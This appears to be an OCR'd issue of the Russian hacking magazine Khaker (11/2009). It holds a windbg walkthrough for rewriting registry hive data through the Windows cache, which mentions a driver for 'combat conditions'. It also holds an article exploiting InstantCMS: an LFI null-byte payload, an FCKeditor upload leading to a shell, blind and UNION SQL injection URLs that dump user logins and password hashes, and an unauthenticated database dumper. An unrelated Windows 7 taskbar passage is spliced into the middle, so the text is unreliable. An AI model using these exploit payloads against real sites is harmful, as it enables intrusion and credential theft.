книги хакеры / журнал хакер / 131_Optimized

MmPagedPoolStart = e1000000; 48FB00+ e1000000 = e148FB00.

Нашли адрес proto-PTE, сдампим его, то есть получим содержимое.

dd e148FB00 l1 e148fb00 87944cd6

Proto-PTE равен

0x87944cd6 = 1 00001111001010001001 1 00110 1011 0 |->PTE указывает на подраздел

|->Описывает маппируемый файл

Вычислим адрес подраздела (по форм. SubsectionAddress = MmSubsectionBase + PrototypeIndex << 3, обычно MmSubsectionBase == MmNonPagedPoolStart ).

Index = 000011110010100010011011 = F289B << 3 = 7944D8; MmNonPagedPoolStart = 81181000; 7944D8 + 81181000 = 819154D8 — адрес подраздела.

dt _subsection 819154D8 nt!_SUBSECTION

+0x000 ControlArea : 0x819154a8 _CONTROL_AREA

+0x004 u : __unnamed

Section Ref • 1 • Pfn Ref • 2b6 • Mapped Views • 3c User Ref • 0 • WaitForDel • 0 • Flush Count • 0File Object • 818ed338 • ModWriteCount • 0 • System Views • 3c

Flags (8088) NoModifiedWriting File WasPurged

File: \$Mft

Сегмент имеет вид:

dt _SEGMENT e13d66c8 nt!_SEGMENT

Получим такие же значения по открытой карте кэша:

dt _vacb SharedCacheMap 0x8194aa70 nt!_VACB

+0x004 SharedCacheMap : 0x818c7b08 _SHARED_CACHE_MAP

Выборочный вывод структуры открытой карты с интересующими полями:

dt _SHARED_CACHE_MAP 0x818c7b08 nt!_SHARED_CACHE_MAP

PTE кэша начинаются с адреса, который указывается в MmSystemCachePteBase (обычно совпадает с началом таблицы стра-

ниц, 0xC0000000).

Модификацию кэша на практике можно использовать для разных задач. Рассмотрим, например, запись в параметр раздела реестра без применения API-функций, через кэш. В отличие от w2k, в которой диспетчер конфигурации хранил данные кустов в подкачиваемом пуле, в wxp он проецирует файлы кустов реестра, используя объектыразделы.

Попробуем модифицировать данные в разделе HKCU. Файл раздела хранится в \Document and Setting\<account name>\NTUSER>DAT. Если запустить приведенную выше программку windbg, ты сможешь увидеть, что этих файлов смаппировано несколько, например, для встроенной учетной записи системы — NetworkService:

Vacb #280 0x819baa40 -> 0xd0180000

File: 0x81765610

Offset: 0x00000000

\Documents and Settings\root\NTUSER.DAT

Root — моя учетная запись

Vacb #289 0x819bab18 -> 0xcf6c0000 File: 0x81666bf8

Offset: 0x00000000

\Documents and Settings\NetworkService\NTUSER.DAT

Этот VACB описывает куст для учетной записи NetworkService. Воспользуемся первым выводом для записи root. Она показала, что адрес данных в кэше 0xd0180000, при этом проекция идет с начала файла, смещение ноль. Также воспользуемся командой !fileobj для вывода более подробной информации.

kd> !fileobj 0x81765610

\Documents and Settings\root\NTUSER.DAT

Access: Read Write -> присутствует тип доступа Write, значит, страницы раздела будут сброшены в куст на диске Flags: 0x140040

Cache Supported

Handle Created

Random Access

FsContext: 0xe1632d90 FsContext2: 0xe3efdc18

Private Cache Map: 0x816750e0 CurrentByteOffset: 0

Cache Data:

Section Object Pointers: 81812d84 -> принадлежит FSD Shared Cache Map: 81675008

File Offset: 0 in VACB number 0

ВЗЛОМ

УСПЕХ!

Vacb: 819baa40 -> íàø VACB

Your data is at: d0180000 -> и адрес данных в кэше

Структура куста — это тема для отдельного доклада, поэтому быстренько пробегаемся по памяти и ищем какие-нибудь данные. Нашли для параметра по умолчанию раздела HKEY_CURRENT_USER\ AppEvents\EventLabels\.Default его значение — Default Beep.

Изменим его, например, так:

eb d018142e 70/eb d0181430 70.

Нужно подождать, пока содержимое кэша сбросится в файл. Это может произойти сразу, а может через некоторое время, в любом случае после перезагрузки данные в файле на диске будут изменены. В этом примере изменения сразу отобразились в regedit (после F5).

Модифицирование данных через windbg хорошая практика, но в боевых условиях нужно писать драйвер, который это будет делать более-менее автоматически. Рассмотрим один из вариантов.

При открытии кустов для мапинга, их дескрипторы сохраняются в системной таблице дескрипторов, доступ к которой можно получить, например, в контексте процесса System. Мы можем перебрать там все дескрипторы (смотри мануалы Ms-remа на wasm) и найти указатели на соответствующие file objectы, которые нам нужны (сравнивая полный путь к кусту с тем, что указано в FileName файлового объекта). Зная адрес файлового объ-

екта, мы выходим на структуру _SECTION_OBJECT_POINTERS,

а затем выходим на открытую карту. То есть, FileObject Æ SectionObjectPointer Æ SharedCacheMap. В SHARED_CACHE_MAP

анализируем, с какого смещения проецируется файл, используя указатель на массив VACB — _SHARED_CACHE_MAPÆ Vacbs. Если по требуемому смещению, например, нулевому, что будет соот-

ветствовать _SHARED_CACHE_MAP Æ Vacbs[0], будет указатель на VACB, то из него мы и получаем указатель на слот с данными. Кстати, чтобы найти количество элементов в массиве, нужно раз-

делить значение, указанное в SHARED_CACHE_MAP.FileSize, на

256 Кб. Напомню, запись из драйвера на страницы кэша нужно осуществлять с предельной осторожностью и только если страница присутствует в памяти. В более сложном варианте нужно анализировать поля PTE и proto-PTE.

Завершающий experience по этому поводу. Я нашел file object для своего \Documents and Settings\root\NTUSER.DAT. Далее:

kd> dt _file_object 0x8169b3c0 SectionObjectPointer ntdll!_FILE_OBJECT

+0x014 SectionObjectPointer : 0x81826b6c _SECTION_

060

OBJECT_POINTERS

kd> dt _SECTION_OBJECT_POINTERS 0x81826b6c SharedCacheMap

ntdll!_SECTION_OBJECT_POINTERS

+0x004 SharedCacheMap : 0x816efd18 -> открытая карта уникальна для дискового файла

kd> dt _SHARED_CACHE_MAP 0x816efd18 Vacbs nt!_SHARED_CACHE_MAP

+0x040 Vacbs : 0x81868e78 -> 0x819baa88 _VACB -> массив VACB

Кроме того:

kd> dt _SHARED_CACHE_MAP 816efd18 FileSize

nt!_SHARED_CACHE_MAP

+0x008 FileSize : _LARGE_INTEGER 0x140000

0x140000 / 0x40000 = 5 элементов в массиве указателей VACB.

Теперь смело дампим его:

kd> dd 0x81868e78 l8

81868e78 819baa88 819baba8 819bab60 819babd8

81868e88 819baa70 00000000 00000000 00000000

Видим, что в кэше присутствуют все части файла 5 * 256 * 1024 = 0x140000 байт.

Если нам нужны данные со смещения ноль, то выполняем команду:

kd> dt _VACB 819baa88 BaseAddress nt!_VACB

0x000 BaseAddress : 0xcfb40000

Это, собственно, и есть данные с начала файла ntuser.dat.

ТЕПЕРЬ ВСЕ! Для модифицирования нужных данных необходимо иметь парсер реестра и знать, с какого смещения в кусте начинаются данные. А дальше — по вышеприведенной схеме. Аналогичным образом модифицируются и данные в MFT, но об этом я расскажу в другой раз, после того, как скушаешь и переваришь информацию :). На этой ноте кланяюсь и еще раз желаю удачи в отладке! z

XÀÊÅÐ 11 /131/ 09

Реклама

ВЗЛОМ

SPYDER SPYDER@ANTICHAT.NET

В ПРЕДДВЕРИИ АТАКИ Бродя по просторам рунета, я наткнулся на один сайт. Его контент очень напоминал CMS, и я решил узнать, что же он из себя представляет. Недолго думая, я попытался найти админку, вбив в адресную строку:

www.site.ru/admin/

После этого мне оставалось только лицезреть поле ввода логина и пароля, а также надпись «InstantCMS — Авторизация». Навестив гугл с запросом InstantCMS, первым результатом я получил ссылку на официальный сайт двига — www.instantcms.ru. Последней версией на данный момент оказалась 1.5.2. Через минуту исходники лежали на моем жестком диске.

GRAY-BOX

Подняв на своем компьютере apache и mysql, я установил цмс и принялся за анализ исходного кода. Первое, что бросилось в

глаза — это папка wysiwyg, в которой находился до боли знакомый FCKeditor. На мой взгляд, FCKeditor — лучший помощник при наличии локального инклуда. По адресу

http://localhost/wysiwyg/editor/filemanager/

connectors/test.html

находится аплодер файлов. К сожалению, файлы с расширением

.php, .phtml, .cgi и т.п. залить не получится, однако при наличии LFI это уже неважно, ведь файл с любым расширением выполнится как php-код. LFI+FCKeditor — и шелл у нас в кармане. Но все же это трудно назвать уязвимостью InstantCMS, потому что разработкой фцкэдитора занимаются совсем другие люди. Поэтому, так как все работает через mod_rewrite, я решил заглянуть в .htaccess и нашел там вот что:

#COMPONENT "RSS FEEDS"

RewriteRule ^rss/([a-z]*)/(.*)/feed.rss$ /components/rssfeed/frontend.php?&target=$1&item_id=$2

В надежде найти SQL-Injection я направился к файлу frontend.php и увидел там интересный код:

if (isset($_REQUEST['do'])){ $do = $_REQUEST['do'];

} else { $do = 'rss'; }

if (isset($_REQUEST['target'])){ $target = $_REQUEST['target'];

} else { die(); }

if (isset($_REQUEST['item_id'])) {

FCKEDITOR НАСАЙТЕ

INSTANTCMS.RU

$item_id = $_REQUEST['item_id']; } else { die(); }

...

if ($do=='rss'){ $rss = '';

if (file_exists($_SERVER['DOCUMENT_ROOT']. '/components/'.$target.'/prss.php')){

$inCore->includeFile('components/'. $target.'/prss.php');

Да это же чистой воды Local File Inclusion в переменной $target! Если в конфигурации PHP директива magic_quotes_gpc = off , мы можем проинклудить любой файл, указав нул-байтом конец строки таким образом:

http://localhost/components/rssfeed/frontend.php?item_id= 1&target=../../../../../../../../../../../../etc/hosts%00

Следует заметить, что способ обхода magic_quote_gpc подстановкой >4000 слешей в данном случае работать не будет, так как путь до файла объявлен с помощью переменной $_SERVER['DOCUMENT_ ROOT'], а, следовательно, вызов функции getcwd() не выполняется.

Унас есть LFI, а залить файл с php-кодом внутри уже не проблема,

—вспомни про FCKeditor. В случае если администратор отключил

загрузку файлов в едиторе, ты можешь зарегистрировать нового пользователя в системе и залить аватар со злым содержимым :).

УКОЛ ВСЛЕПУЮ И НЕ ТОЛЬКО

Инклуд это хорошо, но и на этом я не остановился, и присмотрелся внимательнее к коду файла frontend.php:

if (file_exists($_SERVER['DOCUMENT_ROOT']. '/components/'.$target.'/prss.php'))

{

$inCore->includeFile('components/'.$target.'/prss.php'); eval('rss_'.$target.'($item_id, $cfg, $rssdata);');

Впапке components находились различные компоненты системы, но

яискал такие, где находился бы файл prss.php, и нашел такой

function rss_blog($item_id, $cfg, &$rssdata){

...

$cat = dbGetFields('cms_blogs', 'id='.$item_id, 'id, title');

Поиск функции dbGetFields привел меня к файлу /core/cms.php:

Одна из самых заметных новинок с позиции пользователя (даже самого ушастого) — это, конечно же,

обновленный таскбар. Это не просто симпатичная панелька с большими кнопками, а удобный инструмент, объединяющий в себе механизм для быстрого запуска программ, управления окнами и доступа

к последним документам. Это стало возможным за счет так называемых Jumpлистов. По своей сути такой выпадающий список аналогичен меню «Пуск», но только для конкретного приложения — в нем отображается список последних документов, ключевые опции приложения. За при-

мером далеко ходить не нужно — кликни в таскбаре правой кнопкой мыши по иконке Internet Explorer 8.0.

С помощью Jump-листов ты сможешь быстро перейти по линку из истории браузера. Удобно, правда? К сожалению, полноценная поддержка нового таскбара пока не реализована во всех

приложениях (кстати, статья по этому поводу уже была у нас в Кодинге). Но недостаток исправляется энтузиастами: для популярных программ выходят специальные хаки. Например, для плеера Winamp давно раз-

работан специальный плагин win7shell (code.google.com/p/ win7shell).

УСПЕШНОВЫПОЛНЕННЫЙДАМПБАЗЫ

ПАНЕЛЬУПРАВЛЕНИЯСАЙТОМ

function dbGetFields($table, $where, $fields, $order='id ASC')

{

$inDB = cmsDatabase::getInstance(); return $inDB->get_fields($table,

$where, $fields, $order);

}

По правде говоря, все эти скачки по файлам мне изрядно поднадоели, но финиш был близок. Файл /core/classes/db.class.php показал мне содержимое функции get_fields:

public function get_fields($table, $where,

$fields, $order='id ASC')

{

$sql = "SELECT $fields FROM $table WHERE $where ORDER BY $order LIMIT 1";

$result = $this->query($sql);

if ($this->num_rows($result))

{

$data = $this->fetch_assoc($result); return $data;

}else {

return false;

}

}

На всем пути моего путешествия я не встретил ни одной проверки значения переменной item_id, за исключением файла .htaccess. Следовательно, у нас в кармане sql-injection, но, к сожалению слепая. Пример использования:

http://localhost/components/rssfeed/frontend.php? item_id=1+and+1=if(substring(version(),1,1)=5)&targe t=blog

Как быстро раскрутить слепую инъекцию — читай в статье Qwazar’a в предыдущем номере z. Инъекция это хорошо, а еще лучше — когда видишь результат запроса; через 10 минут анализа кода был найден файл core/ajax/tagsearch.php, а в нем — следующее содержимое:

$q = iconv('UTF-8//IGNORE', 'WINDOWS-1251//IGNORE', $_GET['q']);

$q = strtolower($q); if (!$q)

return;

define("VALID_CMS", 1); include($_SERVER['DOCUMENT_ROOT'].

'/includes/config.inc.php'); include($_SERVER['DOCUMENT_ROOT']. '/includes/database.inc.php');

$sql = "SELECT tag FROM cms_tags WHERE LOWER(tag) LIKE '{$q}%' GROUP BY tag";

$rs = mysql_query($sql);

...

И к моему удивлению — также никакой проверки переменной $_GET[‘q’], плюс ко всему результат запроса выводился на страницу. Запрос

http://localhost/core/ajax/tagsearch.php?q=notexist

tag}'+union+select+concat(login,':',password)+from+c ms_users+limit+1,1--+

показал мне логин и md5(пароль) первого пользователя в базе, а убрав limit, я получил всех пользователей. Данная SQl-Injection будет работать только при отключенной директиве magic_quotes_ gpc.

БОЛЬШЕ ЧЕМ ДАМПЕР

Не рассчитывая на что-то большее, я залогинился в админке с целью найти способ заливки веб-шелла, и первое, на что обратил внимание, был дампер базы данных. Я решил найти его исходник в папке admin. Но он оказался совсем в другом месте, а именно — в core/ajax/dumper.php. Самое интересное, что при прямом обращении к нему не было никакой авторизации! А это значит, любой пользователь без админских привилегий может сделать дамп базы.

if ($inCore->request('file', 'str'))

{

$shortfile = $inCore->request('file', 'str'); } else {

$shortfile = date('d-m-Y').'.sql';

}

$opt = $inCore->request('opt', 'str', 'export');